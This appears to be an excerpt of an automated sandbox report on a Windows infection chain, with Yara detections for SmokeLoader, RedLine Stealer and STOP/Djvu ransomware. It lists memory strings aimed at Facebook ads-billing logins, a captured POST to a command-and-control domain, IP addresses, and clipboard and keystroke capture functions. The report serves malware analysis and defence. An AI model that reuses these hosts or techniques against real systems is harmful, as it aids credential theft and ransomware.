Source: llpb1133.exe, 00000014.00000002.602167234.00000000004BA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billingbook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing equals www.facebook.com (Facebook)
Source: 98D7.exe, 00000010.00000002.603774182.0000000000549000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billinging equals www.facebook.com (Facebook)
Source: 98D7.exe, 00000010.00000003.482623800.0000000000558000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billingm) equals www.facebook.com (Facebook)
Source: 98D7.exe, 00000010.00000003.477974039.00000000004CF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billings equals www.facebook.com (Facebook)
Source: 98D7.exe, 00000010.00000003.482623800.0000000000558000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.facebook.com:443 equals www.facebook.com (Facebook)
Source: llpb1133.exe, 00000014.00000002.604730284.0000000002820000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.facebook.com:443/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing equals www.facebook.com (Facebook)
Source: llpb1133.exe, 00000014.00000002.604730284.0000000002820000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.facebook.com:443/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing0 equals www.facebook.com (Facebook)
Source: llpb1133.exe, 00000014.00000002.602167234.00000000004D1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: ihttps://www.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing equals www.facebook.com (Facebook)
Source: 98D7.exe, 00000010.00000002.605295836.00000000028BA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: ninstagram.com blob: *.fbcdn.net *.fbsbx.com www.facebook.com *.facebook.com data:;frame-src *.facebook.com *.fbsbx.com fbsbx.com data: *.fbcdn.net facebook.com fbwifigateway.net *.fbwifigateway.net fbcdn.net cdninstagram.com *.cdninstagram.com oculuscdn.com *.oculuscdn.com www.meta.com *.www.meta.com;worker-src blob: *.facebook.com data:;block-all-mixed-content;upgrade-insecure-requests;report-uri https://www.facebook.com/csp/reporting/?m=c&minimize=0; equals www.facebook.com (Facebook)
Source: 98D7.exe, 00000010.00000002.605295836.00000000028BA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: ninstagram.com blob: *.fbcdn.net *.fbsbx.com www.facebook.com *.facebook.com data:;frame-src *.facebook.com *.fbsbx.com fbsbx.com data: *.fbcdn.net facebook.com fbwifigateway.net *.fbwifigateway.net fbcdn.net cdninstagram.com *.cdninstagram.com oculuscdn.com *.oculuscdn.com www.meta.com *.www.meta.com;worker-src blob: *.facebook.com data:;block-all-mixed-content;upgrade-insecure-requests;report-uri https://www.facebook.com/csp/reporting/?m=c&minimize=0;x-fb-rlafr0Persistent-AuthWWW-AuthenticateVarySet-CookieServerRetry-AfterProxy-SupportProxy-AuthenticateP3Phttps://www.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billingLocationETagAuthentication-InfoAgeAccept-RangesLast-ModifiedSat, 01 Jan 2000 00:00:00 GMTExpiresContent-RangeContent-MD5Content-LocationContent-LanguageContent-Encodingtext/html; charset="utf-8"Content-Type0Content-LengthAllowWarningViaUpgradeTransfer-EncodingTrailerno-cachePragmaKeep-AliveTue, 07 Feb 2023 18:46:36 GMTDateProxy-ConnectioncloseConnectionprivate, no-cache, no-store, must-revalidateCache-ControlPG7 equals www.facebook.com (Facebook)
Source: 98D7.exe, 00000010.00000003.485181523.00000000028B2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: ol</a></li><li><a class="_sv4" dir="ltr" href="https://tr-tr.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing" onclick="require(&quot;IntlUtils&quot;).setCookieLocale(&quot;tr_TR&quot;, &quot;en_US&quot;, &quot;https:\/\/tr-tr.facebook.com\/login.php?next=https\u00253A\u00252F\u00252Fwww.facebook.com\u00252Fads\u00252Fmanager\u00252Faccount_settings\u00252Faccount_billing&quot;, &quot;www_list_selector&quot;, 6); return false;" title="Turkish">T equals www.facebook.com (Facebook)
Source: 98D7.exe, 00000010.00000003.485181523.00000000028B2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: onloadRegister_DEPRECATED(function (){begin_polling_login_cookies("https:\/\/www.facebook.com\/ads\/manager\/account_settings\/account_billing");});</script> equals www.facebook.com (Facebook)
Source: llpb1133.exe, 00000014.00000002.602167234.0000000000489000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: rXVad9Rwww.facebook.comaAc2sNw2CQ/tDh equals www.facebook.com (Facebook)
Source: 98D7.exe, 00000010.00000003.485706369.00000000004CF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: report-to: {"max_age":259200,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/?device_level=unknown"}]} equals www.facebook.com (Facebook)
Source: llpb1133.exe, 00000014.00000002.602167234.00000000004A1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: report-to: {"max_age":86400,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/?minimize=0"}],"group":"coep_report"}, {"max_age":259200,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/?device_level=unknown"}]} equals www.facebook.com (Facebook)
Source: 98D7.exe, 00000010.00000003.485181523.00000000028B2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: s (Portugal)</a></li><li><a class="_sv4" dir="ltr" href="https://sq-al.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing" onclick="require(&quot;IntlUtils&quot;).setCookieLocale(&quot;sq_AL&quot;, &quot;en_US&quot;, &quot;https:\/\/sq-al.facebook.com\/login.php?next=https\u00253A\u00252F\u00252Fwww.facebook.com\u00252Fads\u00252Fmanager\u00252Faccount_settings\u00252Faccount_billing&quot;, &quot;www_list_selector&quot;, 4); return false;" title="Albanian">Shqip</a></li><li><a class="_sv4" dir="ltr" href="https://es-la.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing" onclick="require(&quot;IntlUtils&quot;).setCookieLocale(&quot;es_LA&quot;, &quot;en_US&quot;, &quot;https:\/\/es-la.facebook.com\/login.php?next=https\u00253A\u00252F\u00252Fwww.facebook.com\u00252Fads\u00252Fmanager\u00252Faccount_settings\u00252Faccount_billing&quot;, &quot;www_list_selector&quot;, 5); return false;" title="Spanish">Espa equals www.facebook.com (Facebook)
Source: 98D7.exe, 00000010.00000002.602257740.00000000004CF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: sFullUpdate:true,needsPartialUpdate:false,shouldLogResourcePerf:false},3977],["WebStorageMonsterLoggingURI",[],{uri:"/ajax/webstorage/process_keys/?state=1"},3032],["BrowserPaymentHandlerConfig",[],{enabled:false},3904],["TimeSpentConfig",[],{delay:1000,timeout:64,"0_delay":0,"0_timeout":8},142],["cr:1634616",["UserActivityBlue"],{__rc:["UserActivityBlue","Aa1oVQO0yWyvfaoFs9wSOeaQlUPyEbHP8fawDnddMqXKEgKpM_9koC5Pk5-P8qhie_uf5KCJjyNsPhcEXFNVNUCWnLk"]},-1],["cr:844180",["TimeSpentImmediateActiveSecondsLoggerBlue"],{__rc:["TimeSpentImmediateActiveSecondsLoggerBlue","Aa1oVQO0yWyvfaoFs9wSOeaQlUPyEbHP8fawDnddMqXKEgKpM_9koC5Pk5-P8qhie_uf5KCJjyNsPhcEXFNVNUCWnLk"]},-1],["cr:1187159",["BlueCompatBroker"],{__rc:["BlueCompatBroker","Aa1oVQO0yWyvfaoFs9wSOeaQlUPyEbHP8fawDnddMqXKEgKpM_9koC5Pk5-P8qhie_uf5KCJjyNsPhcEXFNVNUCWnLk"]},-1],["ImmediateActiveSecondsConfig",[],{sampling_rate:0},423]],require:[["NavigationMetrics","setPage",[],[{page:"/login.php",page_type:"normal",page_uri:"https://www.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing",serverLID:"7197487234070021903"}]],["FalcoLoggerTransports","attach",[],[]],["ClickRefLogger"],["DetectBrokenProxyCache","run",[],[0,"c_user"]],["NavigationClickPointHandler"],["WebDevicePerfInfoLogging","doLog",[],[]],["WebStorageMonster","schedule",[],[]],["DeferredCookie","addToQueue",[],["_js_datr","gZziYzzFf_vTKeue4tgHUC4S",63072000000,"/",true,false,true]],["DeferredCookie","addToQ equals www.facebook.com (Facebook)
Source: 98D7.exe, 00000010.00000003.484805156.0000000000502000.00000004.00000020.00020000.00000000.sdmp, 98D7.exe, 00000010.00000003.485706369.00000000004C8000.00000004.00000020.00020000.00000000.sdmp, 98D7.exe, 00000010.00000003.480306540.0000000000513000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: www.facebook.com equals www.facebook.com (Facebook)
Source: 98D7.exe, 00000010.00000002.605295836.000000000289E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: www.facebook.com/ equals www.facebook.com (Facebook)
Source: 98D7.exe, 00000010.00000003.461533941.000000000052C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: www.facebook.com07"cohort":"1:swl:"," equals www.facebook.com (Facebook)
Source: llpb1133.exe, 00000014.00000002.604730284.0000000002834000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: www.facebook.com3966fc5c1f009ecd22e4b74973b5675 equals www.facebook.com (Facebook)
Source: llpb1133.exe, 00000014.00000002.602167234.00000000004E4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: www.facebook.com5 equals www.facebook.com (Facebook)
Source: llpb1133.exe, 00000014.00000002.602167234.0000000000522000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: www.facebook.com5 equals www.facebook.com (Facebook)
Source: llpb1133.exe, 00000014.00000003.520897937.00000000004BA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: www.facebook.comN equals www.facebook.com (Facebook)
Source: llpb1133.exe, 00000014.00000002.604730284.0000000002841000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: www.facebook.comP equals www.facebook.com (Facebook)
Source: 98D7.exe, 00000010.00000002.603774182.0000000000549000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: www.facebook.comQ equals www.facebook.com (Facebook)
Source: llpb1133.exe, 00000014.00000002.602167234.0000000000522000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: www.facebook.comU equals www.facebook.com (Facebook)
Source: 98D7.exe, 00000010.00000002.603774182.0000000000549000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: www.facebook.comh8 equals www.facebook.com (Facebook)
Source: llpb1133.exe, 00000014.00000002.604730284.0000000002820000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: www.facebook.comook.com/-y equals www.facebook.com (Facebook)
Source: llpb1133.exe, 00000014.00000002.602167234.0000000000522000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: www.facebook.comppatey.com|vk equals www.facebook.com (Facebook)
Source: llpb1133.exe, 00000014.00000002.602167234.0000000000522000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: www.facebook.comvwq equals www.facebook.com (Facebook)
Source: llpb1133.exe, 00000014.00000002.602167234.0000000000522000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: www.facebook.com} equals www.facebook.com (Facebook)
Source: 98D7.exe, 00000010.00000003.485706369.00000000004C8000.00000004.00000020.00020000.00000000.sdmp, 98D7.exe, 00000010.00000003.477974039.00000000004C8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: {"max_age":259200,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/?device_level=unknown"}]} equals www.facebook.com (Facebook)
Source: llpb1133.exe, 00000014.00000002.604730284.0000000002841000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: {"max_age":86400,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/?minimize=0"}],"group":"coep_report"}, {"max_age":259200,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/?device_level=unknown"}]} equals www.facebook.com (Facebook)
Source: 98D7.exe, 00000010.00000002.605295836.000000000288C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: {"status":3,"accounts":"0"}JaU9pSlNSVWszYlhjaWZleUp6YVdRaU9qSTRPREF4T1N3aWRHbHRaU0k2TVRZM05UUT09ctingClientSingleton:{r:["Jg4hod5","3zhsDmU","Yv2Rq7N"],rds:{m:["ContextualConfig","BladeRunnerClient","DGWRequestStreamClient","MqttLongPollingRunner","BanzaiScuba_DEPRECATED"],r:["c6kpRKc","9Zir1u8","sqCOqNp","HN4gUih","foz7nw7","msMcd10","TjYa5zM","5p9Jgd9","Ajrp3n3","CUpDMe1"]},be:1},RequestStreamCommonRequestStreamCommonTypes:{r:["Jg4hod5"],be:1}}}},allResources:["c6kpRKc","sqCOqNp","GpQFBwL","TjYa5zM","foz7nw7","CUpDMe1","msMcd10","BnbajS7","HN4gUih","Da6rL6k"]});}));</script></body></html>ActiveSecondsConfig",[],{sampling_rate:0},423]],require:[["NavigationMetrics","setPage",[],[{page:"/login.php",page_type:"normal",page_uri:"https://www.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing",serverLID:"7197487281236720703"}]],["FalcoLoggerTransports","attach",[],[]],["ClickRefLogger"],["DetectBrokenProxyCache","run",[],[0,"c_user"]],["NavigationClickPointHandler"],["WebDevicePerfInfoLogging","doLog",[],[]],["WebStorageMonster","schedule",[],[]],["Artillery","disable",[],[]],["ScriptPathLogger","startLogging",[],[]],["TimeSpentBitArrayLogger","init",[],[]],["DeferredCookie","addToQueue",[],["_js_datr","jJziY-D4SfNE_AIOga4wSI2k",63072000000,"/",true,false,true]],["DeferredCookie","addToQueue",[],["_js_sb","jJziY-AS0VgVTvocQFmmqm_m",63072000000,"/",false,false,true]]]},hsrp:{hsdp:{clpData:{"1871697":{r:1,s:1},"1829319":{P equals www.facebook.com (Facebook)
Source: 98D7.exe, 00000010.00000002.605295836.000000000288C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: {"status":3,"accounts":"0"}JaU9pSlNSVWszYlhjaWZleUp6YVdRaU9qSTRPREF4T1N3aWRHbHRaU0k2TVRZM05UUT09ctingClientSingleton:{r:["Jg4hod5","3zhsDmU","Yv2Rq7N"],rds:{m:["ContextualConfig","BladeRunnerClient","DGWRequestStreamClient","MqttLongPollingRunner","BanzaiScuba_DEPRECATED"],r:["c6kpRKc","9Zir1u8","sqCOqNp","HN4gUih","foz7nw7","msMcd10","TjYa5zM","5p9Jgd9","Ajrp3n3","CUpDMe1"]},be:1},RequestStreamCommonRequestStreamCommonTypes:{r:["Jg4hod5"],be:1}}}},allResources:["c6kpRKc","sqCOqNp","GpQFBwL","TjYa5zM","foz7nw7","CUpDMe1","msMcd10","BnbajS7","HN4gUih","Da6rL6k"]});}));</script></body></html>ActiveSecondsConfig",[],{sampling_rate:0},423]],require:[["NavigationMetrics","setPage",[],[{page:"/login.php",page_type:"normal",page_uri:"https://www.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing",serverLID:"7197487281236720703"}]],["FalcoLoggerTransports","attach",[],[]],["ClickRefLogger"],["DetectBrokenProxyCache","run",[],[0,"c_user"]],["NavigationClickPointHandler"],["WebDevicePerfInfoLogging","doLog",[],[]],["WebStorageMonster","schedule",[],[]],["Artillery","disable",[],[]],["ScriptPathLogger","startLogging",[],[]],["TimeSpentBitArrayLogger","init",[],[]],["DeferredCookie","addToQueue",[],["_js_datr","jJziY-D4SfNE_AIOga4wSI2k",63072000000,"/",true,false,true]],["DeferredCookie","addToQueue",[],["_js_sb","jJziY-AS0VgVTvocQFmmqm_m",63072000000,"/",false,false,true]]]},hsrp:{hsdp:{clpData:{"1871697":{r:1,s:1},"1829319":{PPTP){3DFD28C0-5D9B-43CA-809F-C01D8A78D17E}}Ada11 equals www.facebook.com (Facebook)
Source: unknown HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://qmxjpgcre.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 196Host: potunulit.org
Source: unknown HTTPS traffic detected: 158.69.96.67:443 -> 192.168.2.3:49700 version: TLS 1.2
Source: unknown HTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.3:49701 version: TLS 1.2
Source: unknown HTTPS traffic detected: 157.240.253.35:443 -> 192.168.2.3:49709 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.3:49714 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.3:49716 version: TLS 1.2
Source: unknown HTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.3:49717 version: TLS 1.2
Source: unknown HTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.3:49721 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing
barindex
Yara detected SmokeLoader
Source: Yara match File source: 00000000.00000002.313394418.0000000000851000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.313299344.0000000000720000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.443874552.00000000007E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.444700260.00000000021E1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Contains functionality for read data from the clipboard
Source: C:\Users\user\AppData\Local\Temp\4113.exe Code function: 11_2_00402830 Concurrency::cancel_current_task,Concurrency::cancel_current_task,Concurrency::cancel_current_task,OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,SetClipboardData,CloseClipboard,CloseClipboard,GlobalFree,OpenClipboard,GetClipboardData,CloseClipboard,GlobalLock,GlobalUnlock,CloseClipboard,CloseClipboard, 11_2_00402830
Contains functionality to read the clipboard data
Source: C:\Users\user\AppData\Local\Temp\4113.exe Code function: 11_2_00402830 Concurrency::cancel_current_task,Concurrency::cancel_current_task,Concurrency::cancel_current_task,OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,SetClipboardData,CloseClipboard,CloseClipboard,GlobalFree,OpenClipboard,GetClipboardData,CloseClipboard,GlobalLock,GlobalUnlock,CloseClipboard,CloseClipboard, 11_2_00402830
Creates a DirectInput object (often for capturing keystrokes)
Source: file.exe, 00000000.00000002.313412011.0000000000918000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

Spam, unwanted Advertisements and Ransom Demands
barindex
Yara detected Djvu Ransomware
Source: Yara match File source: 15.2.3046.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 33.2.3046.exe.23515a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 42.2.3046.exe.23315a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.3046.exe.23515a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.3046.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 42.2.3046.exe.23315a0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 33.2.3046.exe.23515a0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.3046.exe.23515a0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 39.2.3046.exe.23815a0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 39.2.3046.exe.23815a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000D.00000002.396916881.0000000002350000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.467843881.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000002A.00000002.518796436.0000000002330000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000021.00000002.516427401.0000000002350000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000027.00000002.518320509.0000000002380000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 3046.exe PID: 3680, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 3046.exe PID: 5672, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 3046.exe PID: 3112, type: MEMORYSTR

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 15.2.3046.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 15.2.3046.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 33.2.3046.exe.23515a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 33.2.3046.exe.23515a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 42.2.3046.exe.23315a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 42.2.3046.exe.23315a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 13.2.3046.exe.23515a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 13.2.3046.exe.23515a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 15.2.3046.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 15.2.3046.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 42.2.3046.exe.23315a0.1.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 42.2.3046.exe.23315a0.1.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 33.2.3046.exe.23515a0.1.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 33.2.3046.exe.23515a0.1.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 13.2.3046.exe.23515a0.1.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 13.2.3046.exe.23515a0.1.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 39.2.3046.exe.23815a0.1.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 39.2.3046.exe.23815a0.1.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 39.2.3046.exe.23815a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 39.2.3046.exe.23815a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 14.0.A33B.exe.7b0000.0.unpack, type: UNPACKEDPE Matched rule: Detects downloader / injector Author: ditekSHen
Source: 00000011.00000002.443553763.0000000000640000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000011.00000002.444263115.0000000000816000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000002.313442333.0000000000926000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 0000000D.00000002.396738460.000000000222E000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000021.00000002.516055302.00000000022BA000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 0000002A.00000002.518333813.0000000002290000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000012.00000002.483535048.0000000000726000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000002.313241208.0000000000680000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 0000000D.00000002.396916881.0000000002350000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000000.00000002.313394418.0000000000851000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000000.00000002.313299344.0000000000720000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 0000000F.00000002.467843881.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 0000000F.00000002.467843881.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000011.00000002.443874552.00000000007E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 0000000B.00000002.604551133.0000000000550000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000012.00000002.483475283.00000000006D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 0000000B.00000002.605642320.00000000007C6000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000011.00000002.444700260.00000000021E1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000027.00000002.517661661.00000000022E4000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 0000002A.00000002.518796436.0000000002330000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000021.00000002.516427401.0000000002350000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000027.00000002.518320509.0000000002380000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: Process Memory Space: 3046.exe PID: 3680, type: MEMORYSTR Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: Process Memory Space: 3046.exe PID: 5672, type: MEMORYSTR Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: Process Memory Space: 3046.exe PID: 3112, type: MEMORYSTR Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: C:\Users\user\AppData\Local\Temp\A33B.exe, type: DROPPED Matched rule: Detects downloader / injector Author: ditekSHen
Detected VMProtect packer
Source: llpb1133.exe.14.dr Static PE information: .vmp0 and .vmp1 section names
One or more processes crash
Source: C:\Users\user\AppData\Local\Temp\ECFB.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 996 -s 520
Detected potential crypto function
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00415458 0_2_00415458
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0041545C 0_2_0041545C
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040B403 0_2_0040B403
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00411D50 0_2_00411D50
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00413E21 0_2_00413E21
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00412294 0_2_00412294
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004127D8 0_2_004127D8
Source: C:\Users\user\AppData\Local\Temp\4113.exe Code function: 11_2_004010E0 11_2_004010E0
